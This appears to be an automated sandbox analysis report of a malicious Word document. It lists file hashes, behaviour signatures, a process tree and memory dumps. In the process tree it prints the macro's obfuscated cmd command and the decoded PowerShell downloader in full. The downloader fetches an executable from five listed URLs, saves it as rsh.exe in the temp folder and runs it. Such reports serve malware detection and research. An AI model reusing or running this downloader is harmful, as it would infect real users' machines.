Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    19-05-2024 20:34

General

  • Target

    5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc

  • Size

    87KB

  • MD5

    5b5523e3de0be3f3888924ee205feefc

  • SHA1

    57a0ded868c84a681e05aacfa483e9cf2bdd0875

  • SHA256

    6fc0496f0b92374c976b56da6a0e3aa03bd960a04207a0354b0f2ba6c2654be9

  • SHA512

    0049a31b6e8fb45d7fddf1b98beda860b8ce21d21ac74efc1a9018ab6b494180b05580a5842a223462d8c1170c16ea7439bf9aff38004b73de145445f3ffbf71

  • SSDEEP

    1536:+Bocn1kp59gxBK85fBnx+amHIUAHcAdAbRjf7ZD+gB:X41k/W487oRnZlB

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2756
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2800
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell "powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like '*MZ*') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} "
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2884
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =wwH
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1928

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      0441f54cb195a7a24621e4ca39c70f6e

      SHA1

      2989eff9c0a196169fbcb6ffeddc70f38c6ba481

      SHA256

      43ee158bc73052f3e02e7dcddb3f7881c37231864f6370c5acbc489b19e2424c

      SHA512

      8cc29883a880a83730ba302c9e0212de33fd73088517d9d866ccb336dc897e67f5cc951c55696c20cc7a45ef64af82876b5d9232d683ba1751d5d3eadb7f65fe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      7470bbea6fb7d9fe2a636721b23a0c4f

      SHA1

      eb3ac01fcd62313ccfec329a1b62b2c52ee62715

      SHA256

      b3b1facac31584d1bbe474dc7831792bfeb18c82be1d547b3609b7ce0e6867b1

      SHA512

      17cf23a089782bb89f9e7fe76b67f5ffda69037efc442e1fc0c5bb094197e7597df6b481a556b137a45f8d5203b636f072f3a8963d935a7552f6fb84d12bff27

    • memory/2756-6-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-0-0x000000002F651000-0x000000002F652000-memory.dmp

      Filesize

      4KB

    • memory/2756-7-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-8-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-2-0x00000000719FD000-0x0000000071A08000-memory.dmp

      Filesize

      44KB

    • memory/2756-26-0x00000000719FD000-0x0000000071A08000-memory.dmp

      Filesize

      44KB

    • memory/2756-27-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2756-42-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2756-43-0x00000000719FD000-0x0000000071A08000-memory.dmp

      Filesize

      44KB

    • memory/2884-21-0x0000000005570000-0x000000000558F000-memory.dmp

      Filesize

      124KB